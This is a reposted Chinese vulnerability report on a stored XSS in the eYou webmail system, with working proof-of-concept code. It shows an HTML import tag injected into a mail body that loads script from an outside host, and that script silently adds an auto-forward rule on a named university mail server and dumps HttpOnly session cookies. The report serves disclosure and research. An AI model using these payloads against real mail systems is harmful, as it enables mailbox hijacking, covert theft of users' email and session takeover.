eYou邮件系统邮件正文存储型XSS2(内附eYouXSS影响证明)

没穿底裤
没穿底裤
没穿底裤
714
文章
0
评论
2020年1月1日06:24:19评论1,013 views字数 986阅读3分17秒阅读模式
摘要

retanoj新玩意儿,影响Chrome。

在测试这个XSS过程中发现一处很严重的HttpOnly COOKIE泄漏,导致邮件正文型XSS能够获取用户全部COOKIE从而进行登陆。内有POC

(wooyun上有一些关于eyou邮件正文型XSS的报告,你们给的回应全都是“已有解决方案”、“问题已知,谢谢报告”。然而测试了几所大学的邮件系统,全都没修复,感觉你们是在逗我.....)

漏洞作者:

retanoj

详细说明:

新玩意儿,影响Chrome。

在测试这个XSS过程中发现一处很严重的HttpOnly COOKIE泄漏,导致邮件正文型XSS能够获取用户全部COOKIE从而进行登陆。内有POC

(wooyun上有一些关于eyou邮件正文型XSS的报告,你们给的回应全都是“已有解决方案”、“问题已知,谢谢报告”。然而测试了几所大学的邮件系统,全都没修复,感觉你们是在逗我.....)

漏洞证明:

发邮件,Burpsuite拦截,content_html插入一句HTML

<link rel="import" href="http://www.129.cc/x.php"> (网站是我本地测试用的,x.php自己可控)

eYou邮件系统邮件正文存储型XSS2(内附eYouXSS影响证明)

1.打开邮件自动设置自动转寄地址POC。

http://www.129.cc/x.php  <html>  <?php header("Access-Control-Allow-Origin: *"); ?> //关键点,允许跨域  <script>  //设置自动转寄  var url = "http://mail.bit.edu.cn/user/?q=settings.forward.do&zid=";  var zid = parent.gZid;  var data = "[email protected]&is_save=1&is_opened=1&action=add";  var xhr = new XMLHttpRequest();  xhr.open("POST", url+zid, true);  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");  xhr.send(data);  </script>  </html>

 

刷新网站,截图证明

eYou邮件系统邮件正文存储型XSS2(内附eYouXSS影响证明)

eYou邮件系统邮件正文存储型XSS2(内附eYouXSS影响证明)

2.获取HTTPOnly Cookie

不多说,你们把所有Cookie写在打开邮件后的form里,简直不能理解。截图证明

获取EMPHPSID POC

http://www.129.cc/x.php  <?php header("Access-Control-Allow-Origin: *"); ?>  <script>console.log(parent.document.getElementsByTagName('html')[0].innerHTML);</script>

 

eYou邮件系统邮件正文存储型XSS2(内附eYouXSS影响证明)

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日06:24:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   eYou邮件系统邮件正文存储型XSS2(内附eYouXSS影响证明)https://cn-sec.com/archives/76293.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息